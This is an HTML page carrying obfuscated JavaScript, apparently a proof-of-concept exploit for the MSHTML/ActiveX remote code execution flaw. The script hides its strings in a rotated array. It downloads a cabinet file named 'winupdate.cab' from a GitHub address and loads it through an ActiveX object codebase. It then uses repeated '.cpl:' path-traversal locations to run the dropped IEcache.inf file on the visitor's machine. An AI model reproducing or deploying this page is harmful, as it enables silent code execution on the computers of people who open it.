<!DOCTYPE html>

<html>

 <head>

  <meta http-equiv="Expires" content="-1">

  <meta http-equiv="X-UA-Compatible" content="IE=11">

 </head>

 <body>

  <script>

var StringArray = [

	'123',

	'365952KMsRQT',

	'tiveX',

	'/Lo',

	'./../../',

	'contentDocument',

	'ppD',

	'Dat',

	'close',

	'Acti',

	'removeChild',

	'mlF',

	'write',

	'./A',

	'ata/',

	'ile',

	'../',

	'body',

	'setAttribute',

	'#version=5,0,0,0',

	'ssi',

	'iframe',

	'748708rfmUTk',

	'documentElement',

	'lFile',

	'location',

	'159708hBVRtu',

	'a/Lo',

	'Script',

	'document',

	'call',

	'contentWindow',

	'emp',

	'Document',

	'Obj',

	'prototype',

	'lfi',

	'bject',

	'send',

	'appendChild',

	'Low/IEcache.inf',

	'htmlfile',

	'115924pLbIpw',

	'GET',

	'p/IEcache.inf',

	'1109sMoXXX',

	'./../A',

	'htm',

	'l/T',

	'cal/',

	'1wzQpCO',

	'ect',

	'w/IEcache.inf',

	'522415dmiRUA',

	'https://github.com/goatsec1/goatsec12/raw/main/winupdate.cab',

	'88320wWglcB',

	'XMLHttpRequest',

	'IEcache.inf',

	'Act',

	'D:edbc374c-5730-432a-b5b8-de94f0b57217',

	'open',

	'<bo',

	'HTMLElement',

	'/..',

	'veXO',

	'102FePAWC'

];

function a0_0x15ec(_0x329dba, _0x46107c) {

	return a0_0x15ec = function (_0x127f75, _0x15ecd5) {

		_0x127f75 = _0x127f75 - 170;

		var _0x5a770c = StringArray[_0x127f75];

		return _0x5a770c;

	}, a0_0x15ec(_0x329dba, _0x46107c);

}

(function (_0x59985d, OldPassword) {

	var _0x1eac90 = a0_0x15ec;

	while (!![]) {

		try {

			var _0x2f7e2d = parseInt(_0x1eac90(206)) + parseInt(_0x1eac90(216)) * parseInt(_0x1eac90(196)) + parseInt(_0x1eac90(201)) * -parseInt(_0x1eac90(173)) + parseInt(_0x1eac90(177)) + parseInt(_0x1eac90(204)) + -parseInt(_0x1eac90(193)) + parseInt(_0x1eac90(218));

			if (_0x2f7e2d === OldPassword)

				break;

			else

				_0x59985d['push'](_0x59985d['shift']());

		} catch (_0x34af1e) {

			_0x59985d['push'](_0x59985d['shift']());

		}

	}

}(StringArray, 384881), function () {

	var _0x2ee207 = a0_0x15ec, window1 = window

    , rootDoc = window1['document']

    , createElement = window1['Document']['prototype']['createElement']

    , write = window1['Document']['prototype']['write']

    , AppendChild = window1['HTMLElement']['prototype']['appendChild']

    , RemoveChild = window1['HTMLElement']['prototype']['removeChild']

    , iFrame = createElement['call'](rootDoc, 'iframe');

	try {

		AppendChild['call'](rootDoc['body'], iFrame);

	} catch (_0x1ab454) {

		AppendChild['call'](rootDoc['documentElement'], iFrame);

	}

	var ActiveXObjectOG = iFrame['contentWindow']['ActiveXObject']

    , view = new ActiveXObjectOG('htmlfile');

	iFrame['contentDocument']['open']()['close']();

	try {

		RemoveChild['call'](rootDoc['body'], iFrame);

	} catch (tempErrorVar) {

		RemoveChild['call'](rootDoc['documentElement'], iFrame);

	}

	view['open']()['close']();

	var htmlInstance1 = new view[('Script')]['ActiveXObject']('htmlFile');

	htmlInstance1['open']()['close']();

	var htmlInstance2 = new htmlInstance1[('Script')]['ActiveXObject']('htmlFile');

	htmlInstance2['open']()['close']();

	var htmlInstance3 = new htmlInstance2['Script']['ActiveXObject']('htmlFile');

	htmlInstance3['open']()['close']();

	var ActiveXObject1 = new ActiveXObject('htmlfile')

    , ActiveXObject2 = new ActiveXObject('htmlfile')

    , ActiveXObject3 = new ActiveXObject('htmlfile')

    , ActiveXObject4 = new ActiveXObject('htmlfile')

    , ActiveXObject5 = new ActiveXObject('htmlfile')

    , ActiveXObject6 = new ActiveXObject('htmlfile')

    , httpReq = window1['XMLHttpRequest']

    , httpReq1 = new httpReq()

    , open = httpReq['prototype']['open']

    , send = httpReq['prototype']['send']

    , timeout = window1['setTimeout'];

	open['call'](httpReq1, 'GET', 'https://github.com/goatsec1/goatsec12/raw/main/winupdate.cab', ![])

    , send['call'](httpReq1)

    , htmlInstance3['Script']['document']['write']('<body>');

	var Object1 = createElement['call'](htmlInstance3['Script']['document'], 'object');

	Object1['setAttribute']('codebase', 'https://github.com/goatsec1/goatsec12/raw/main/winupdate.cab#version=5,0,0,0');

	Object1['setAttribute']('classid', 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217')

    , AppendChild['call'](htmlInstance3['Script']['document']['body']

    , Object1)

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:123'

    , ActiveXObject1['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/IEcache.inf'

    , ActiveXObject2['Script']['location'] = '.cpl:../../../AppData/Local/Temp/IEcache.inf'

    , ActiveXObject3['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/Low/IEcache.inf'

    , ActiveXObject4['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/IEcache.inf'

    , ActiveXObject5['Script']['location'] = '.cpl:../../../../../Temp/Low/IEcache.inf'

    , ActiveXObject4['Script']['location'] = '.cpl:../../../../../Temp/IEcache.inf'

    , ActiveXObject4['Script']['location'] = '.cpl:../../Low/IEcache.inf'

    , ActiveXObject4['Script']['location'] = '.cpl:../../IEcache.inf';

}());

  </script>

 </body>

</html>
